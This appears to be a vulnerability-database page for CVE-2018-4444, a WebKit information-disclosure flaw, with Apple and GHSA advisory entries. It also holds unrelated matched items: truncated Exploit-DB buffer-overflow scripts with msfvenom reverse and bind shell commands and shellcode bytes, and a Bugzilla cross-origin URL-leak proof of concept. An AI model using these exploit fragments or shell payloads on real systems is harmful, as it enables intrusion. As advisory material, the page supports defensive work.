CVE-2018-4444
published 2020-10-27CVE-2018-4444: A logic issue was addressed with improved state management. This issue is fixed in Safari 12.0.2, iOS 12.1.1, tvOS 12.1.1, iTunes 12.9.2 for Windows…
PriorityP430medium6.5CVSS 3.1
AVNACLPRNUIRSUCHINAN
EPSS
1.10%
62.1th percentile
A logic issue was addressed with improved state management. This issue is fixed in Safari 12.0.2, iOS 12.1.1, tvOS 12.1.1, iTunes 12.9.2 for Windows. Processing maliciously crafted web content may disclose sensitive user information.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | ios | — | — |
| apple | ios | >= unspecified < 12.1 | 12.1 |
| apple | iphone_os | < 12.1.1 | 12.1.1 |
| apple | itunes | < 12.9.2 | 12.9.2 |
| apple | itunes_12.9.2_for_windows | — | — |
| apple | itunes_for_windows | >= unspecified < 12.9 | 12.9 |
| apple | safari | < 12.0.2 | 12.0.2 |
| apple | safari | — | — |
| apple | safari | >= unspecified < 12.0 | 12.0 |
| apple | tvos | < 12.1.1 | 12.1.1 |
| apple | tvos | — | — |
| apple | tvos | >= unspecified < 12.1 | 12.1 |
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Apple
CVE-2018-4444: Safari 12.0.2
vendor_apple·2018-12-05·CVSS 6.5
CVE-2018-4444 [MEDIUM] CVE-2018-4444: Safari 12.0.2
Apple Security Update: About the security content of Safari 12.0.2
Product: Safari
Version: 12.0.2
CVE: CVE-2018-4444
Component: WebKit
Impact: Processing maliciously crafted web content may disclose sensitive user information
Description: A logic issue was addressed with improved state management.
Apple
CVE-2018-4444: tvOS 12.1.1
vendor_apple·2018-12-05·CVSS 6.5
CVE-2018-4444 [MEDIUM] CVE-2018-4444: tvOS 12.1.1
Apple Security Update: About the security content of tvOS 12.1.1
Product: tvOS
Version: 12.1.1
CVE: CVE-2018-4444
Component: WebKit
Impact: Processing maliciously crafted web content may disclose sensitive user information
Description: A logic issue was addressed with improved state management.
Apple
CVE-2018-4444: iTunes 12.9.2 for Windows
vendor_apple·2018-12-05·CVSS 6.5
CVE-2018-4444 [MEDIUM] CVE-2018-4444: iTunes 12.9.2 for Windows
Apple Security Update: About the security content of iTunes 12.9.2 for Windows
Product: iTunes 12.9.2 for Windows
CVE: CVE-2018-4444
Component: WebKit
Impact: Processing maliciously crafted web content may disclose sensitive user information
Description: A logic issue was addressed with improved state management.
Apple
CVE-2018-4444: iOS 12.1.1
vendor_apple·2018-12-05·CVSS 6.5
CVE-2018-4444 [MEDIUM] CVE-2018-4444: iOS 12.1.1
Apple Security Update: About the security content of iOS 12.1.1
Product: iOS
Version: 12.1.1
CVE: CVE-2018-4444
Component: WebKit
Impact: Processing maliciously crafted web content may disclose sensitive user information
Description: A logic issue was addressed with improved state management.
GHSA
GHSA-46h6-5944-7cqw: A logic issue was addressed with improved state management
ghsa_unreviewed·2022-05-24
CVE-2018-4444 [MEDIUM] GHSA-46h6-5944-7cqw: A logic issue was addressed with improved state management
A logic issue was addressed with improved state management. This issue is fixed in Safari 12.0.2, iOS 12.1.1, tvOS 12.1.1, iTunes 12.9.2 for Windows. Processing maliciously crafted web content may disclose sensitive user information.
No detection rules found.
Exploit-DB
DVD X Player 5.5.3 - '.plf' Buffer Overflow
exploitdb·2019-03-21·CVSS 7.8
CVE-2018-9128 [HIGH] DVD X Player 5.5.3 - '.plf' Buffer Overflow
DVD X Player 5.5.3 - '.plf' Buffer Overflow
---
#!/usr/bin/env python
# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - [email protected]
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438
# In Windows 7, SEH handler to be used contains a \x00 byte that it has been
# obtained using a restricted char. For such a reason, every jump has to be
# backward on the beginning of attacking shellcode.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v
Exploit-DB
Ayukov NFTP FTP Client 2.0 - Buffer Overflow
exploitdb·2019-01-02·CVSS 9.8
CVE-2017-15222 [CRITICAL] Ayukov NFTP FTP Client 2.0 - Buffer Overflow
Ayukov NFTP FTP Client 2.0 - Buffer Overflow
---
# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222
# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python
import socket
IP = '192.168.43.28'
port = 21
buf = ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\
Exploit-DB
Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)
exploitdb·2018-07-09
Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)
Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)
---
# Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)
# Date: 2018-07-08
# Software Link: http://www.boxoft.com/wav-to-wma/
# Software Version:1.0
# Exploit Author: Achilles
# Target: Windows 7 x64
# CVE:
# Description: A malicious .wav file cause this vulnerability.
# Category: Local Exploit
buffer = "A" * 4132
buffer+= "\x90\x90\xeb\x06" #jmp short 6
buffer+= "\x34\x14\x40\x00" # pop pop retn
buffer+= "\x90" * 20
buffer+= ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\
Bugzilla
Continuously revealing of Cross-Origin URL (history navigation) is possible using performance.getEntriesByType() on Firefox for iOS
bugzilla·2018-10-08
[MEDIUM] Continuously revealing of Cross-Origin URL (history navigation) is possible using performance.getEntriesByType() on Firefox for iOS
Continuously revealing of Cross-Origin URL (history navigation) is possible using performance.getEntriesByType() on Firefox for iOS
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Steps to reproduce:
We can not reproduce this issue using meta-refreshes that points to history.back(); page on Mozilla Firefox for iOS, but we can reproduce this issue when we use JavaScript location property.
POC:
http://pwning.click/xoriginscriptback.php:
setTimeout(function(){alert(performance.getEntriesByType("resource")[0].name)},5000);
setTimeout(function(){ location.replace("http://pwning.click/histback.html") }, 10000);
Type anything into the search bar and press ENTER!
Then I'll figure out your secret search!
h
Bugzilla
CVE-2018-5704 openocd: Cross-protocol scripting attacks due to not blocking HTTP POST attempts on port 4444
bugzilla·2018-01-16·CVSS 9.6
CVE-2018-5704 [CRITICAL] CVE-2018-5704 openocd: Cross-protocol scripting attacks due to not blocking HTTP POST attempts on port 4444
CVE-2018-5704 openocd: Cross-protocol scripting attacks due to not blocking HTTP POST attempts on port 4444
Open On-Chip Debugger (OpenOCD) 0.10.0 does not block attempts to use HTTP POST for sending data to 127.0.0.1 port 4444, which allows remote attackers to conduct cross-protocol scripting attacks, and consequently execute arbitrary commands, via a crafted web site.
Bug report:
https://sourceforge.net/p/openocd/mailman/message/36188041/
Discussion:
Created openocd tracking bugs for this issue:
Affects: epel-all [bug 1535119]
Affects: fedora-all [bug 1535118]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual commun
https://support.apple.com/en-us/HT209340https://support.apple.com/en-us/HT209342https://support.apple.com/en-us/HT209344https://support.apple.com/en-us/HT209345https://support.apple.com/en-us/HT209340https://support.apple.com/en-us/HT209342https://support.apple.com/en-us/HT209344https://support.apple.com/en-us/HT209345
2020-10-27
Published